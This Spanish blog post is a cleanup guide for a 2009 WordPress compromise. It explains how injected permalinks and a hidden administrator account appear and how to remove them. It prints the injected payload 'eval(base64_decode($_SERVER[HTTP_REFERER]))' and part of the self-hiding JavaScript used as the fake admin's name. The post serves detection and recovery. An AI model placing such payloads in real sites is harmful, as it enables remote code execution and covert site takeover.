sqlinjection

Durante el día de hoy hubo epidemia de un problema bastante curioso y preocupante. Varios usuarios han informado de un error mediante el cual todos los enlaces de sus blogs se convertían a un permalink que daba errores, en algunos casos incluso siendo detectados como virus por el software antivirus instalado en los ordenadores de los visitantes. A mi me avisó Manuel Ángel Fernández.

Más o menos lo que pasaba es que los permalinks pasaban de esto:

http://miblog.com/mi-post/

a esto otro:

http://miblog.com/mi-post/${eval(base64_decode($_SERVER[HTTP_REFERER]))}

o parecidos. Por supuesto, tales permalinks daban error, no mostrando nada al visitante.

Pues bien, esto es debido a una inyección MySQL que afecta a varias versiones de WordPress (incluida la actual), mediante el cual se pueden crear usuarios con capacidades de Administrador y hacer lo que quieran con tu sitio. Lo peor es que es complicado de verlo hasta que no te lo encuentras así.

El síntoma más claro, además del cambio de permalinks, es ir a la gestión de usuarios y fijarte si el contador de Administradores muestra un número mayor de los que en realidad hay y puedes ver en la lista. Sorprendente, pues da igual si permites registros o no en tu WordPress, se cuela.

Dirás entonces ¿y como borro un administrador que no veo ni puedo editar?. Afortunadamente se puede, pues ese administrador fantasma tendrá un ID de usuario posterior al último número de ID de usuario que veas (por orden de registro).

Digamos que, por ejemplo, el último usuario registrado, al poner el ratón sobre el enlace para editarlo, muestra esta URL:

http://miblog.com/wp-admin/user-edit.php?user_id=4&wp_http_referer=%2Fwp-admin%2Fusers.php

Para editar el administrador fantasma copias esa URL y le subes un número al ID mostrado. O sea …

http://miblog.com/wp-admin/user-edit.php?user_id=5&wp_http_referer=%2Fwp-admin%2Fusers.php

Te encontrarás editando un usuario que no veías y que, ¡sorpresa!, es administrador y tiene un nombre cuando menos extraño, lleno de codigos …

administrador fantasma

El nombre, como podrás ver, es código nada benigno:

... <div id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s =************ </script></div>

Normalmente no tiene email, le añades un email ficticio al perfil y le degradas a Suscriptor (luego lo borras si quieres, desde aquí o desde la base de datos). Con ese paso ya ha perdido sus derechos de hacer lo que quiera en tu blog, pero el problema no está solucionado, por supuesto.

Como puedes imaginar, lo siguiente que hay que hacer es devolver los permalinks a su estado original, pues estarán cambiados en la página de configuración de Enlaces permanentes. Los cambias de …

/%year%/%monthnum%/%day%/%postname%/%eval(base64_decode($_SERVER[HTTP_REFERER]

a tus permalinks, por ejemplo …

/%postname%/

Con esto ya funciona tu sitio correctamente, pero la amenaza sigue.

Hasta que haya una actualización que solucione esto (y si hay solución permanente la desconozco), te recomiendo actualizar a la última versión (no garantiza nada pues está pasando en WordPress con la 2.8.4), cambia todas las claves de administrador y, sobre todo, de la base de datos de tu WordPress, comprueba que los ficheros “index.php” vacíos de tus carpetas (wp-content, etc) realmente están vacíos y no contienen código adicional, comprueba si hay archivos que no deberían estar en tu instalación de WordPress, borra o renombra el fichero xmlrpc.php pues parece ser el principal culpable de dar entrada al problema, revisa con frecuencia la lista de administradores de tu sitio, y vuelve a cargar una versión limpia de WordPress borrando antes todos los archivos que no sepas que los has cargado tu (como la carpeta wp-content o .htaccess).

Más información:

Para finalizar, te dejo unos enlaces que te ruego revises para blindar lo máximo posible tu instalación de WordPress:

Como limpiar completamene tu sitio si ya ha sido afectado

A grandes males grandes remedios. Si tu sitio ya ha sido infectado puedes estar seguro que pronto lo estará de nuevo a no ser que salga pronto una solución. Si quieres tener ciertas garantías igual es interesante que realices una operación de limpieza profunda:

  1. Exporta todo tu contenido mediante la utilidad de exportación de WordPress y guarda la carpeta wp-content así como cualquier otra que utilices de modo manual. Revisa tu theme y carpetas de uploads, etc, antes de darlos por seguros.
  2. Cambia todas las contraseñas: ftp, base de datos. Usa contraseñas fuertes, usando caracteres alfanuméricos y símbolos
  3. Como el problema afecta a la base de datos hay que descartarla. Borra la actual y crea una nueva
  4. Borra todo el contenido de la instalación actual de WordPress (recuerda que antes has hecho backup)
  5. Instala un WordPress limpio (última versión), usando la información de la nueva base de datos recién creada
  6. Carga tu carpeta wp-content de nuevo, una vez comprobado que todo está limpio
  7. Importa los posts de tu sitio que exportaste con la utilidad de importación de WordPress
  8. Configura tu WordPress de manera segura siguiendo las instrucciones de los enlaces facilitados

Actualización:
Nos comenta Alex que en el trac está identificado el problema hace tiempo, desde la versión 2.7.1, y que el bug, relativo a llamadas “eval” está corregido en la versión 2.8.5, disponible en el trunk, o descargando y sustituyendo los ficheros classes.php y rewrite.php, o haciendo manualmente los cambios en estos archivos como se indica aquí.

Novedades:
He comprobado en varios sitios que el intruso puede actuar de varias maneras. En algunos casos no está cambiando los permalinks a “eval(base64_decode($_SERVER[HTTP_REFERER]” o similares, sino que pone – por ejemplo – los permalinks por defecto.

También revisad no solo el número de ID de usuario inmediatamente superior al que veáis. Si aún se muestra un número de administradores superior al de perfiles de admin que veis ir añadiendo números a la URL de editar usuario hasta que deis con el intruso; en algunos casos estoy viendo que se añade con IDs de usuario aleatorios, no precisamente el siguiente al existente.

¿Te gustó este post? ¡Compártelo!

<a rel="nofollow" href="http://bitacoras.com/anotaciones/http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="Bitacoras.com"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/03c43_bitacoras.png" alt="Bitacoras.com" /></a>
<a rel="nofollow" href="http://twitter.com/home?status=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="TwitThis"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/03c43_twitter.png" alt="TwitThis" /></a>
<a rel="nofollow" href="http://www.facebook.com/share.php?u=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F&amp;t=Permalinks%20cambiados%20a%20%22eval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%22" title="Facebook"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/03c43_facebook.png" alt="Facebook" /></a>
<a rel="nofollow" href="http://meneame.net/submit.php?url=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="Meneame"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/03c43_meneame.png" alt="Meneame" /></a>
<a rel="nofollow" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F&amp;title=Permalinks%20cambiados%20a%20%22eval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%22&amp;annotation=%0D%0A%0D%0ADurante%20el%20d%C3%ADa%20de%20hoy%20hubo%20epidemia%20de%20un%20problema%20bastante%20curioso%20y%20preocupante.%20Varios%20usuarios%20han%20informado%20de%20un%20error%20mediante%20el%20cual%20todos%20los%20enlaces%20de%20sus%20blogs%20se%20convert%C3%ADan%20a%20un%20permalink%20que%20daba%20errores%2C%20en%20algunos%20casos%20incluso" title="Google Bookmarks"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/03c43_googlebookmark.png" alt="Google Bookmarks" /></a>
<a rel="nofollow" href="http://delicious.com/post?url=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F&amp;title=Permalinks%20cambiados%20a%20%22eval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%22&amp;notes=%0D%0A%0D%0ADurante%20el%20d%C3%ADa%20de%20hoy%20hubo%20epidemia%20de%20un%20problema%20bastante%20curioso%20y%20preocupante.%20Varios%20usuarios%20han%20informado%20de%20un%20error%20mediante%20el%20cual%20todos%20los%20enlaces%20de%20sus%20blogs%20se%20convert%C3%ADan%20a%20un%20permalink%20que%20daba%20errores%2C%20en%20algunos%20casos%20incluso" title="del.icio.us"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/e518e_delicious.png" alt="del.icio.us" /></a>
<a rel="nofollow" href="https://favorites.live.com/quickadd.aspx?marklet=1&amp;url=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F&amp;title=Permalinks%20cambiados%20a%20%22eval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%22" title="Live"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/e518e_live.png" alt="Live" /></a>
<a rel="nofollow" href="http://technorati.com/faves?add=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="Technorati"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/e518e_technorati.png" alt="Technorati" /></a>
<a rel="nofollow" href="http://ping.fm/ref/?link=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F&amp;title=Permalinks%20cambiados%20a%20%22eval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%22&amp;body=%0D%0A%0D%0ADurante%20el%20d%C3%ADa%20de%20hoy%20hubo%20epidemia%20de%20un%20problema%20bastante%20curioso%20y%20preocupante.%20Varios%20usuarios%20han%20informado%20de%20un%20error%20mediante%20el%20cual%20todos%20los%20enlaces%20de%20sus%20blogs%20se%20convert%C3%ADan%20a%20un%20permalink%20que%20daba%20errores%2C%20en%20algunos%20casos%20incluso" title="Ping.fm"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/e518e_ping.png" alt="Ping.fm" /></a>
<a rel="nofollow" href="http://www.wikio.com/vote?url=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="Wikio"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/e518e_wikio.png" alt="Wikio" /></a>
<a rel="nofollow" href="http://www.printfriendly.com/getpf?url=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="Turn this article into a PDF!"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/b7d3f_pdf.png" alt="Turn this article into a PDF!" /></a>
<a rel="nofollow" href="mailto:?subject=Permalinks+cambiados+a+%22eval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%22&amp;body=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="E-mail this story to a friend!"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/b7d3f_email_link.png" alt="E-mail this story to a friend!" /></a>
<a rel="nofollow" href="http://www.printfriendly.com/print?url=http%3A%2F%2Fayudawordpress.com%2Fpermalinks-cambiados-a-evalbase64_decode_serverhttp_referer%2F" title="Print this article!"><img src="http://lab.redmallorca.com/wp-content/plugins/wp-o-matic/cache/b7d3f_printfriendly.png" alt="Print this article!" /></a>


Via http://feedproxy.google.com/~r/AyudaWordpress/~3/nDQkS2EtKMA//a>

Related Posts with Thumbnails
Tagged with:  

Comments are closed.

Weboy